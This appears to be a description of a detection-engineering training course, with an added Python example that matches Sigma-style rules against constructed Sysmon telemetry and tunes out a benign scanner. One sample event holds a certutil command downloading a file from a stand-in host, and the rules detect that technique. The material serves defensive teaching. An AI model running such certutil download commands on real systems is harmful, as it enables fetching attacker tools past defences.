Detection Engineering is a new approach to threat detection that involves more than just writing detection rules: it is a repeatable process that produces high-quality, resilient detections. Developing good detection rules requires a detailed understanding of attacker tactics, techniques and procedures (TTPs). These TTPs are executed in a lab environment in order to generate telemetry that contains the attack. In the next step, the malicious behavior is identified within that dataset and turned into resilient, high-quality detections.
In this training you will learn how to master this process of developing high-quality detection rules. The focus is on detection engineering and detection rule development for Windows and Linux endpoints. The training is not tied to a specific SIEM vendor: detections are written in Sigma, the generic and open detection rule format. Sigma rules developed in this course can be converted with the Sigma tooling into the query languages of common SIEM and EDR products and used in your environment.
Detection Engineering Process
Detection Objective and Threat Research based on the MITRE ATT&CK Matrix
Building a Detection Engineering Lab Environment in Splunk
Executing Attacks using Atomic Red Team and Kali Linux
Developing Detections using Sigma
Detection Testing and Detection Tuning
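The outlined process end to end, as an added illustration that is not part of the course materials or of any Sigma project code: a constructed set of Sysmon process-creation events stands in for the lab telemetry, a first Sigma-style rule (written as a Python dict that mirrors the Sigma YAML layout) catches certutil downloading a file over HTTP (ATT&CK T1105, Ingress Tool Transfer), and a tuning pass adds a filter for a benign parent process that the same telemetry turned up. The matcher below is a deliberately small subset of Sigma's detection semantics written for this example, not pySigma or the sigma-cli converter; the VendorScan agent, the hosts, users and URLs are hypothetical.

```python
"""Minimal Sigma-style rule matcher run over constructed Sysmon telemetry.
Illustration only: a small subset of Sigma's detection semantics (search maps,
contains/endswith/all modifiers, 'selection and not filter'), not pySigma."""

# Constructed sample telemetry shaped like Sysmon Event ID 1 (process creation)
# after JSON ingestion. Field names follow Sysmon; all values are made up.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/p.bin p.bin",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "LAB\\alice"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://updates.vendorscan.invalid/sig.db sig.db",
     "ParentImage": r"C:\Program Files\VendorScan\scan.exe", "User": "NT AUTHORITY\\SYSTEM"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "LAB\\alice"},
]

# First draft of the rule as a dict mirroring the Sigma YAML layout. It flags
# certutil fetching a file over HTTP (ATT&CK T1105 behaviour).
RULE_V1 = {
    "title": "Certutil Download via URL Cache (example rule)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": r"\certutil.exe",
            "CommandLine|contains|all": ["-urlcache", "http"],
        },
        "condition": "selection",
    },
    "level": "high",
}

# Tuned version: the lab run showed the (hypothetical) VendorScan agent issuing
# the same command line for signature updates, so a filter excludes that parent
# process instead of weakening the selection itself.
RULE_V2 = {
    **RULE_V1,
    "detection": {
        **RULE_V1["detection"],
        "filter_vendorscan": {"ParentImage|endswith": r"\VendorScan\scan.exe"},
        "condition": "selection and not filter_vendorscan",
    },
}


def _match_value(actual, expected, modifiers):
    """Compare one field value the way Sigma does: case-insensitive, with the
    contains / endswith modifiers changing the comparison."""
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()
    if "contains" in modifiers:
        return e in a
    if "endswith" in modifiers:
        return a.endswith(e)
    return a == e


def match_map(event, search_map):
    """A Sigma search map is an AND of its fields; a list value is an OR of the
    listed values unless the 'all' modifier turns it into an AND."""
    for key, expected in search_map.items():
        field, *modifiers = key.split("|")
        values = expected if isinstance(expected, list) else [expected]
        results = [_match_value(event.get(field), v, modifiers) for v in values]
        if not (all(results) if "all" in modifiers else any(results)):
            return False
    return True


def evaluate(rule, event):
    """Evaluate the rule condition for one event. Only the shapes
    'name' and 'name and [not] name ...' are supported here."""
    detection = rule["detection"]
    tokens = detection["condition"].split()
    result = match_map(event, detection[tokens[0]])
    i = 1
    while i < len(tokens):
        if tokens[i] != "and":
            raise ValueError(f"unsupported condition: {detection['condition']}")
        negate = tokens[i + 1] == "not"
        name = tokens[i + 2] if negate else tokens[i + 1]
        sub = match_map(event, detection[name])
        result = result and (not sub if negate else sub)
        i += 3 if negate else 2
    return result


def run_rule(rule, events):
    """Return the events the rule fires on."""
    return [e for e in events if evaluate(rule, e)]


if __name__ == "__main__":
    for rule in (RULE_V1, RULE_V2):
        hits = run_rule(rule, EVENTS)
        print(f"{rule['detection']['condition']!r}: {len(hits)} hit(s)")
        for h in hits:
            print("   ", h["User"], "->", h["CommandLine"])
```

Running the script shows the untuned rule firing twice (the attack and the scanner's update) and the tuned rule firing once, on the attacker's download. Narrowing with a filter on the benign parent process rather than, say, dropping the `http` term keeps the selection tied to the TTP, which is the kind of tuning decision the testing step of the process is meant to surface.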
Student Requirements / Course Prerequisites
A laptop with a browser (Firefox is preferred). The labs are hosted in the cloud and are accessed through the browser.
This course is for anyone interested in detection engineering and detection development, especially Security Analysts, Detection Engineers, Security Engineers, and Red and Purple Teamers.
Patrick Bareiss is a passionate security researcher in the field of threat detection. He combines his security engineering knowledge with his software development experience to create powerful tools that support detection engineering. He is a frequent speaker at security conferences such as RSA APAC, x33fcon, EU ATT&CK, DeepSec Vienna, Black Hat Europe and many more.